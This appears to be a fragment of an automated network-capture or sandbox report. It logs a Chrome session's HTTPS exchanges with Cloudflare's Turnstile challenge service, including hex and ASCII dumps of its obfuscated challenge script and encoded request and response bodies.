                                                                                                                                                                                                                                                                            Data Ascii: ))(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][gN(1878)](k),l)&&(gN(1246)!==gN(1246)?(C=!![],D(),e[gN(1392)](E),e[gN(1392)](F),e[gN(1392)](G),e[gN(1354)](H),I&&e[gN(1061)](T,U),L[gN(682)][gN(1622)]!==0&&(V=W[gN(1853)](X,Y[gN(682)][gN(1622)])),Q[gN(661)])&&(o={},
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 55 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 59 42 6d 41 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 78 4e 50 68 75 27 3a 67 50 28 31 34 38 33 29 2c 27 6b 63 66 57 4a 27 3a 67 50 28 31 31 37 31 29 2c 27 44 69 4f 64 75 27 3a 67 50 28 31 39 31 30 29 7d 2c 6a 3d 64 5b 67 50 28 31 39 30 31 29 5d 28 29 2c 6b 3d 69 5b 67 50 28 31 39 37 35 29 5d 2c 6a 5b 67 50 28 34 38 37 29 5d 28 6b 29 3e 2d 31 29 7b 69 66 28 67 50 28 35 37 37 29 3d 3d 3d 69 5b 67 50 28 31 36 32 34 29 5d 29 7b 66 6f 72 28 6f 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 35 33 5d 5b 33 5d 5e 69 5b 67 50 28 31 39 35 35 29 5d 28 69 5b 67 50 28 31 38 33 31 29 5d 28 74 68 69 73 2e 68 5b
                                                                                                                                                                                                                                                                            Data Ascii: U':function(n,o){return o===n},'YBmAO':function(n,o,s){return n(o,s)},'xNPhu':gP(1483),'kcfWJ':gP(1171),'DiOdu':gP(1910)},j=d[gP(1901)](),k=i[gP(1975)],j[gP(487)](k)>-1){if(gP(577)===i[gP(1624)]){for(o=this.h[this.g^253][3]^i[gP(1955)](i[gP(1831)](this.h[
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 28 31 38 35 38 29 5d 3d 67 2c 6c 5b 67 50 28 34 38 38 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 67 50 28 31 38 35 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 29 7b 67 53 3d 67 50 2c 65 4d 5b 67 53 28 38 38 33 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 67 53 28 31 30 38 31 29 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 31 38 35 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 67 54 3d 67 50 2c 65 4d 5b 67 54 28 31 35 34 36 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 50 28 37 37 39 29 5d 5b 67 50 28 31 34 30 30 29 5d 28 69 5b 67 50 28 31 33 33 38 29 5d 2c 64 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65 54 3d 7b 7d 2c 65 54 5b 67 4a 28 36 31 32 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 31 33 35 39 29 5d 3d 65 54 2c 65 56 3d 65 4d 5b 67 4a 28 36 38 32 29 5d
                                                                                                                                                                                                                                                                            Data Ascii: (1858)]=g,l[gP(488)]=h,m=l,eM[gP(1853)](function(gS){gS=gP,eM[gS(883)](m,undefined,gS(1081))},10),eM[gP(1853)](function(gT){gT=gP,eM[gT(1546)]()},1e3),eM[gP(779)][gP(1400)](i[gP(1338)],d);return![]},eQ=0,eT={},eT[gJ(612)]=eS,eM[gJ(1359)]=eT,eV=eM[gJ(682)]
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 3d 66 63 2c 65 4d 5b 67 4a 28 35 34 34 29 5d 3d 66 53 2c 65 4d 5b 67 4a 28 39 39 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 69 58 2c 65 29 7b 65 3d 28 69 58 3d 67 4a 2c 7b 27 76 4d 52 6c 71 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 66 56 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 66 54 28 65 5b 69 58 28 31 31 33 33 29 5d 28 66 55 2c 63 29 29 7d 7d 2c 65 4d 5b 67 4a 28 39 34 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 38 37 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6a 67 29 7b 69 66 28 6a 67 3d 67 4a 2c 65 4d 5b 6a 67 28 39 34 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 6a 67 28 39 34 33 29 5d 3d 21 21 5b 5d 7d 2c 67 32 3d 30 2c 65 4e 5b 67 4a 28 31 31 39 31
                                                                                                                                                                                                                                                                            Data Ascii: =fc,eM[gJ(544)]=fS,eM[gJ(996)]=function(c,iX,e){e=(iX=gJ,{'vMRlq':function(g,h){return g(h)}});try{return fV(c)}catch(g){return fT(e[iX(1133)](fU,c))}},eM[gJ(943)]=![],eM[gJ(1875)]=function(jg){if(jg=gJ,eM[jg(943)])return;eM[jg(943)]=!![]},g2=0,eN[gJ(1191
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 2c 27 4c 77 61 70 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 69 49 51 57 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4a 4f 5a 4e 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6c 70 61 65 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 4f 55 79 4b 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 61 6e 45 76 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 53 7a 5a 54 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 72 71 63 67 6a 27 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                                                            Data Ascii: ,'LwapQ':function(h,i){return h==i},'iIQWg':function(h,i){return h-i},'JOZNP':function(h,i){return h<i},'lpaec':function(h,i){return h!=i},'OUyKK':function(h,i){return i*h},'anEvy':function(h,i){return h<i},'SzZTn':function(h,i){return h<i},'rqcgj':functi
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 28 31 34 33 31 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 75 28 31 39 33 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 6a 75 28 31 34 31 39 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 7b 69 66 28 4f 3d 7b 27 42 74 6b 4b 70 27 3a 66 75 6e 63 74 69 6f 6e 28 50 2c 51 2c 6a 76 29 7b 72 65 74 75 72 6e 20 6a 76 3d 6a 75 2c 64 5b 6a 76 28 31 37 36 38 29 5d 28 50 2c 51 29 7d 7d 2c 64 5b 6a 75 28 36 32 36 29 5d 28 47 29 29 72 65 74 75 72 6e 3b 6a 28 64 5b 6a 75 28 31 37 30 35 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 50 2c 6a 77 29 7b 6a 77 3d 6a 75 2c 50 5b 6a 77 28 31 33 33 31 29 5d 3d 4f 5b 6a 77 28 31 34 30 35 29 5d
                                                                                                                                                                                                                                                                            Data Ascii: (1431)](j,1))?(I=0,G[ju(1932)](o(H)),H=0):I++,M>>=1,s++);}D--,D==0&&(D=Math[ju(1419)](2,F),F++),delete B[C]}else{if(O={'BtkKp':function(P,Q,jv){return jv=ju,d[jv(1768)](P,Q)}},d[ju(626)](G))return;j(d[ju(1705)],function(P,jw){jw=ju,P[jw(1331)]=O[jw(1405)]


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            20192.168.2.449768104.18.95.414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1173OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1
                                                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Content-Length: 3112
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            CF-Challenge: xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC3112OUTData Raw: 76 5f 38 65 63 35 37 32 37 66 39 64 30 32 34 31 61 31 3d 4d 6c 57 71 32 71 75 71 4d 71 33 71 47 6a 37 67 6a 37 7a 71 6a 48 71 78 76 57 62 37 70 6a 6d 4e 37 45 46 37 6b 76 56 76 6a 48 75 37 6d 71 4d 57 6a 79 73 57 37 64 55 4b 76 47 62 38 6e 63 37 69 39 71 37 58 48 37 75 76 6b 31 37 43 4a 38 72 37 4a 43 76 6b 6e 37 2d 76 37 4e 37 4b 4a 37 4f 73 38 71 39 32 48 39 37 39 58 53 4f 59 4b 37 6b 62 37 63 24 4c 54 70 31 44 4b 37 42 57 38 69 70 2d 4b 76 76 37 41 79 4a 62 38 61 77 46 64 63 31 6c 47 4a 35 48 55 47 4a 54 62 76 38 7a 55 6d 76 37 55 2d 25 32 62 77 37 6a 2d 38 37 39 54 37 58 76 71 62 37 37 2b 37 79 61 73 33 37 6a 77 75 70 73 65 2d 52 50 79 32 77 56 79 37 62 4b 79 4c 79 4a 38 41 37 37 2d 65 37 39 2d 65 37 39 68 37 76 76 39 52 58 24 2d 57 41 75 54 64 37 39
                                                                                                                                                                                                                                                                            Data Ascii: v_8ec5727f9d0241a1=MlWq2quqMq3qGj7gj7zqjHqxvWb7pjmN7EF7kvVvjHu7mqMWjysW7dUKvGb8nc7i9q7XH7uvk17CJ8r7JCvkn7-v7N7KJ7Os8q92H979XSOYK7kb7c$LTp1DK7BW8ip-Kvv7AyJb8awFdc1lGJ5HUGJTbv8zUmv7U-%2bw7j-879T7Xvqb77+7yas37jwupse-RPy2wVy7bKyLyJ8A77-e79-e79h7vv9RX$-WAuTd79
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:56 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                            Content-Length: 149888
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            cf-chl-gen: Q8QFA+w2xWj+DCNXCp/DVU8w5BXVwcPdlIIE4/uj7Hl4MZ8aNWl7weebzxkymeUNEi7yHGhdo9NvIj94XiFrUsttiNhy2gD0WWypwPkXQZQsV7JkQr2L6E2T5jPPmDbMGqiseWLdzb9eM5ssbgShy1R1RCjlBZurLk8ihjKew84yoERDAF2+Sz6viklZYkHjfPbxZ5N9AMEaRqs5DHK1960+hvjSHa7SE4hI1mr328T9pHZC1EErEn0mjSPWilsS/ZgoEIUBE9Qn80/0JyYgEy9I60uEVc5l2VLEP5j2HRTAl5rhj3PbcdzVBTRTCgrrPJSr+mEjdiuQz2JlGtMLCpjLjuZIS7/j3gg/6A/rN/r3IFzfiviQyBwLg6clEj8E07fyilGQNvnj2CceYBBPlQvXzS3zL7cbbh5bmZg3YcUeU/G/okezTSTjl5zJMYVYkDZpp06xjxKO60vrZHZc9MupAqoejmgKSuFhzVNGI23Njw8=$FyjcSp37+A+/uM//
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5729a2ca4c359-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC622INData Raw: 66 48 47 47 6a 47 5a 57 56 6c 61 58 57 6f 61 58 6a 59 74 78 58 4a 6d 45 6f 58 69 5a 65 4a 32 5a 59 34 79 41 68 6f 57 44 62 6d 69 71 63 58 47 6f 62 6d 71 6b 6f 72 57 72 6b 6f 61 50 6d 70 43 54 6f 72 44 45 70 73 42 2f 6c 62 57 56 76 4b 36 33 68 37 43 6a 70 4b 6d 66 79 34 2b 6d 78 49 75 6e 75 4d 71 6c 75 74 72 5a 75 35 7a 64 33 64 48 6d 34 4e 48 53 73 37 4f 6d 36 73 44 47 78 4c 2f 48 34 2b 37 44 79 2b 72 4a 78 4d 50 74 33 66 33 65 41 64 6a 4b 30 67 4c 65 42 4e 37 55 34 76 50 79 78 4d 4d 49 37 67 6f 45 41 38 72 51 41 51 7a 6a 31 41 55 4c 47 42 51 62 32 2f 6a 57 43 2f 54 75 41 75 4d 53 39 67 4c 30 41 42 6f 70 36 42 34 65 47 2f 41 4c 2b 79 62 76 38 67 6f 71 43 67 67 52 4f 7a 4d 32 45 44 55 41 41 6b 51 5a 48 42 77 6d 52 7a 45 68 45 79 51 36 53 45 78 4b 50 42 46
                                                                                                                                                                                                                                                                            Data Ascii: fHGGjGZWVlaXWoaXjYtxXJmEoXiZeJ2ZY4yAhoWDbmiqcXGobmqkorWrkoaPmpCTorDEpsB/lbWVvK63h7CjpKmfy4+mxIunuMqlutrZu5zd3dHm4NHSs7Om6sDGxL/H4+7Dy+rJxMPt3f3eAdjK0gLeBN7U4vPyxMMI7goEA8rQAQzj1AULGBQb2/jWC/TuAuMS9gL0ABop6B4eG/AL+ybv8goqCggROzM2EDUAAkQZHBwmRzEhEyQ6SExKPBF
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 56 53 50 56 64 72 61 46 5a 4c 4c 6b 4e 71 5a 57 42 72 4e 45 78 6b 4e 58 6c 6e 57 6e 59 36 50 57 77 2f 65 57 75 45 68 47 34 38 56 45 4e 54 59 6f 4e 62 67 55 6c 74 6a 58 74 49 63 6f 52 4c 68 58 56 75 6c 46 64 34 6b 57 65 51 56 56 32 57 6b 33 47 51 64 57 4b 42 6d 36 43 61 61 59 4f 58 72 57 74 72 65 59 4f 65 63 57 36 73 62 37 69 32 70 61 75 72 65 35 5a 33 74 36 46 37 64 61 2b 59 73 4c 4f 30 6e 36 53 38 79 38 4b 34 76 73 32 51 6e 34 71 6f 6e 35 53 78 71 4d 61 69 30 5a 71 30 73 38 44 4a 6d 4a 6a 41 7a 4e 2b 2f 6f 72 69 35 77 2b 66 64 75 39 76 65 79 39 72 61 76 65 36 75 30 2b 54 71 73 4e 61 35 30 4e 50 6f 33 4d 7a 72 37 67 50 2b 30 2b 37 62 2b 76 76 69 42 4f 44 35 35 74 33 63 35 66 6f 43 44 2f 4d 43 31 77 76 31 42 2f 7a 77 47 76 67 68 37 4f 41 44 2b 76 45 63 2b
                                                                                                                                                                                                                                                                            Data Ascii: VSPVdraFZLLkNqZWBrNExkNXlnWnY6PWw/eWuEhG48VENTYoNbgUltjXtIcoRLhXVulFd4kWeQVV2Wk3GQdWKBm6CaaYOXrWtreYOecW6sb7i2paure5Z3t6F7da+YsLO0n6S8y8K4vs2Qn4qon5SxqMai0Zq0s8DJmJjAzN+/ori5w+fdu9vey9rave6u0+TqsNa50NPo3Mzr7gP+0+7b+vviBOD55t3c5foCD/MC1wv1B/zwGvgh7OAD+vEc+
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 70 50 45 39 73 58 31 39 44 4d 6b 78 43 4e 54 6c 58 62 58 68 54 62 48 74 62 54 58 52 5a 4e 6c 74 30 67 32 56 56 66 47 47 4b 59 33 79 4c 65 46 32 45 61 5a 4e 2b 6c 33 64 73 65 47 69 51 57 57 6d 65 57 34 71 4a 69 6c 57 67 68 71 47 6a 6d 32 53 64 5a 70 75 49 71 58 32 46 73 61 57 48 68 58 57 73 6c 33 42 34 73 49 65 37 6e 4c 69 2f 71 35 2b 38 72 36 57 30 77 35 71 56 6b 62 2b 70 67 71 69 48 79 38 4f 76 6e 61 33 42 71 35 61 4f 70 61 2f 52 7a 4a 4b 70 79 4e 71 2f 7a 39 76 66 6d 75 4f 79 35 4d 62 6a 32 74 72 4e 32 38 4c 75 76 4f 7a 54 78 66 48 6f 77 2b 54 6e 75 4d 61 36 36 66 58 33 78 39 7a 32 76 72 7a 56 39 76 7a 46 35 2f 66 6a 2b 38 50 72 43 2b 37 2b 45 77 77 4a 39 4d 63 58 41 74 4c 78 45 2f 7a 54 31 42 76 32 2f 74 73 4f 47 52 62 62 45 2f 6f 52 35 4e 7a 36 43 65
                                                                                                                                                                                                                                                                            Data Ascii: pPE9sX19DMkxCNTlXbXhTbHtbTXRZNlt0g2VVfGGKY3yLeF2EaZN+l3dseGiQWWmeW4qJilWghqGjm2SdZpuIqX2FsaWHhXWsl3B4sIe7nLi/q5+8r6W0w5qVkb+pgqiHy8Ovna3Bq5aOpa/RzJKpyNq/z9vfmuOy5Mbj2trN28LuvOzTxfHow+TnuMa66fX3x9z2vrzV9vzF5/fj+8PrC+7+EwwJ9McXAtLxE/zT1Bv2/tsOGRbbE/oR5Nz6Ce
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 54 6d 31 68 54 48 42 72 5a 33 68 57 64 57 6c 56 67 54 35 56 65 6a 64 56 59 31 5a 53 50 46 32 4b 57 48 6c 6a 57 49 6c 64 59 49 6c 39 62 58 47 4e 61 32 31 79 6b 56 70 74 65 35 57 5a 62 5a 4b 5a 6a 58 32 54 71 59 69 62 6f 48 52 6b 69 70 6d 47 73 70 36 6e 67 4c 52 79 70 36 65 51 73 48 47 73 76 6e 64 31 72 4a 56 2b 6c 61 4f 39 76 49 53 66 6f 34 61 62 72 4d 53 47 70 4b 37 43 6e 72 47 53 30 62 36 51 7a 71 65 6c 6c 63 75 72 79 4a 37 57 6b 38 2f 6a 33 72 79 2f 74 62 6e 71 32 4b 4c 6a 78 73 37 63 32 4b 7a 66 38 73 76 45 39 4b 6d 71 79 50 66 51 72 75 57 33 2b 76 7a 68 2b 50 62 65 34 39 7a 35 38 4e 62 38 43 74 6b 4b 44 75 62 37 78 2b 44 52 42 2f 54 78 31 68 72 74 44 67 72 39 31 74 58 61 33 2f 50 71 41 65 50 58 39 51 63 69 45 76 34 49 4c 53 6f 43 44 66 6a 35 48 54 55
                                                                                                                                                                                                                                                                            Data Ascii: Tm1hTHBrZ3hWdWlVgT5VejdVY1ZSPF2KWHljWIldYIl9bXGNa21ykVpte5WZbZKZjX2TqYiboHRkipmGsp6ngLRyp6eQsHGsvnd1rJV+laO9vISfo4abrMSGpK7CnrGS0b6QzqellcuryJ7Wk8/j3ry/tbnq2KLjxs7c2Kzf8svE9KmqyPfQruW3+vzh+Pbe49z58Nb8CtkKDub7x+DRB/Tx1hrtDgr91tXa3/PqAePX9QciEv4ILSoCDfj5HTU
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 30 56 72 53 45 73 34 62 31 6b 35 55 58 46 55 67 7a 70 63 55 33 39 55 69 6b 70 34 62 47 46 7a 66 58 36 4e 63 56 52 50 63 59 4e 7a 57 32 64 2f 6d 6f 74 54 65 48 56 2b 6f 36 65 43 69 57 64 37 5a 34 4f 64 6d 61 57 43 6f 6e 47 6c 62 61 32 7a 6b 37 69 79 70 35 43 54 62 36 32 4e 73 62 2b 36 74 49 79 45 66 73 4b 41 79 4a 32 59 77 59 6d 5a 72 70 37 48 73 37 76 48 30 4d 33 4c 77 39 44 45 74 63 58 50 72 35 6a 50 31 4e 48 59 6d 74 71 6a 6f 4d 54 63 71 64 2b 36 34 4c 6e 41 75 38 58 4e 71 72 50 4b 36 4d 7a 45 79 4e 58 44 73 39 49 41 74 72 4c 56 36 2b 37 55 31 38 2f 47 78 64 37 72 42 67 76 49 79 65 41 4d 2b 66 48 67 2f 76 62 50 42 78 6a 77 39 76 58 75 31 2b 6a 78 49 76 6b 62 47 67 34 57 41 78 51 6c 48 51 45 48 42 67 34 6e 4c 50 37 2b 43 51 41 55 4e 65 30 70 45 69 6e 31
                                                                                                                                                                                                                                                                            Data Ascii: 0VrSEs4b1k5UXFUgzpcU39Uikp4bGFzfX6NcVRPcYNzW2d/motTeHV+o6eCiWd7Z4OdmaWConGlba2zk7iyp5CTb62Nsb+6tIyEfsKAyJ2YwYmZrp7Hs7vH0M3Lw9DEtcXPr5jP1NHYmtqjoMTcqd+64LnAu8XNqrPK6MzEyNXDs9IAtrLV6+7U18/Gxd7rBgvIyeAM+fHg/vbPBxjw9vXu1+jxIvkbGg4WAxQlHQEHBg4nLP7+CQAUNe0pEin1
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 78 66 65 32 31 2b 66 48 74 45 51 45 56 2b 52 32 5a 5a 67 57 43 47 6b 45 61 52 5a 59 4b 42 65 6e 43 50 57 4a 70 59 56 58 57 57 6d 46 31 78 62 32 35 30 6e 70 57 4a 6e 6d 65 4b 66 36 71 69 68 5a 71 45 64 4b 4b 4d 63 36 70 7a 6f 32 32 39 74 59 5a 36 6c 5a 2b 42 66 4a 53 65 66 38 4c 4a 67 71 72 44 72 63 72 4d 7a 5a 32 78 6e 73 61 50 74 4b 53 6c 77 37 4f 31 6c 73 61 30 7a 38 6e 5a 76 36 37 6a 6f 4c 32 36 77 75 66 4b 6e 4f 76 4e 75 4f 62 48 79 65 69 36 39 4c 44 64 73 37 44 49 38 2b 6a 4f 31 39 37 51 38 75 72 55 38 37 6e 41 33 74 62 69 79 41 69 38 35 4f 7a 64 78 65 6e 4b 32 63 2f 72 39 66 55 56 38 4d 2f 78 30 2f 62 33 45 52 34 58 34 4f 72 7a 41 4f 49 53 49 42 77 55 35 50 67 6d 36 77 63 4c 4a 76 73 74 4c 51 6b 41 4a 69 7a 78 46 66 54 73 4e 66 50 39 2f 67 38 71 41
                                                                                                                                                                                                                                                                            Data Ascii: xfe21+fHtEQEV+R2ZZgWCGkEaRZYKBenCPWJpYVXWWmF1xb250npWJnmeKf6qihZqEdKKMc6pzo229tYZ6lZ+BfJSef8LJgqrDrcrMzZ2xnsaPtKSlw7O1lsa0z8nZv67joL26wufKnOvNuObHyei69LDds7DI8+jO197Q8urU87nA3tbiyAi85OzdxenK2c/r9fUV8M/x0/b3ER4X4OrzAOISIBwU5Pgm6wcLJvstLQkAJizxFfTsNfP9/g8qA
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 54 53 49 4e 39 64 33 31 50 59 34 5a 36 5a 56 4a 64 67 59 5a 67 54 35 74 6b 65 49 68 73 62 5a 64 30 6e 70 42 65 6e 5a 43 52 65 59 70 34 70 32 4b 6b 61 4a 69 4f 68 34 4b 7a 69 61 69 68 68 49 32 45 74 4c 70 38 6b 4c 32 65 72 49 75 43 72 36 53 69 67 4d 50 42 75 71 69 59 6e 5a 71 4d 7a 71 75 4e 68 4d 6a 4b 6b 38 69 31 75 64 53 55 75 71 65 77 72 71 6d 57 31 5a 6e 61 6e 4e 7a 44 70 39 50 41 77 71 75 31 71 4f 4c 44 34 4b 6a 63 72 66 48 57 31 4b 6e 72 32 62 72 37 74 2f 48 51 74 2f 4f 38 2b 64 6e 31 77 77 44 36 77 50 58 57 76 66 55 41 7a 41 62 34 30 65 44 63 42 50 4d 44 37 50 6e 76 34 77 6f 59 32 4f 67 4d 45 69 41 42 33 50 45 46 4a 65 2f 2b 48 69 49 62 34 2b 73 63 2b 41 38 43 2b 75 73 31 44 2f 51 6f 4d 68 44 30 4c 50 63 4f 4e 53 34 72 50 77 34 45 41 43 34 6d 50 30
                                                                                                                                                                                                                                                                            Data Ascii: TSIN9d31PY4Z6ZVJdgYZgT5tkeIhsbZd0npBenZCReYp4p2KkaJiOh4KziaihhI2EtLp8kL2erIuCr6SigMPBuqiYnZqMzquNhMjKk8i1udSUuqewrqmW1ZnanNzDp9PAwqu1qOLD4KjcrfHW1Knr2br7t/HQt/O8+dn1wwD6wPXWvfUAzAb40eDcBPMD7Pnv4woY2OgMEiAB3PEFJe/+HiIb4+sc+A8C+us1D/QoMhD0LPcONS4rPw4EAC4mP0
                                                                                                                                                                                                                                                                            2024-12-03 17:58:56 UTC1369INData Raw: 62 48 74 6f 6b 6d 64 4d 63 6f 5a 76 65 5a 4f 56 66 58 4e 61 6a 6e 71 67 6b 32 4b 6b 6e 34 42 32 63 58 57 57 6c 49 4f 68 6c 32 75 73 6e 47 53 51 62 35 46 79 64 5a 6d 53 6b 72 43 53 72 33 57 2f 73 72 57 76 66 6e 36 43 6b 62 75 58 74 62 4b 71 67 34 71 45 69 35 2b 49 73 35 4b 54 6c 63 61 6f 73 37 72 57 6c 72 47 64 70 70 69 66 76 4c 47 78 32 4d 43 33 34 73 58 45 78 2b 6d 2f 34 36 33 73 30 4c 7a 4c 34 73 75 75 39 4f 6e 69 39 72 54 51 32 76 43 31 35 37 62 37 38 4f 4c 62 33 72 37 78 38 73 50 68 79 75 6e 66 2b 51 67 4e 38 73 77 4c 36 50 58 49 37 50 4c 36 39 2b 67 4e 45 64 76 59 46 4e 66 64 2f 76 30 55 48 75 44 78 48 66 76 64 42 2b 76 39 4a 50 6b 52 41 67 72 75 4c 2f 4c 79 36 76 45 5a 4c 7a 49 6d 4d 30 48 32 46 66 6f 64 2b 79 59 76 50 53 41 5a 53 30 49 59 4b 30 55
                                                                                                                                                                                                                                                                            Data Ascii: bHtokmdMcoZveZOVfXNajnqgk2Kkn4B2cXWWlIOhl2usnGSQb5FydZmSkrCSr3W/srWvfn6CkbuXtbKqg4qEi5+Is5KTlcaos7rWlrGdppifvLGx2MC34sXEx+m/463s0LzL4suu9Oni9rTQ2vC157b78OLb3r7x8sPhyunf+QgN8swL6PXI7PL69+gNEdvYFNfd/v0UHuDxHfvdB+v9JPkRAgruL/Ly6vEZLzImM0H2Ffod+yYvPSAZS0IYK0U
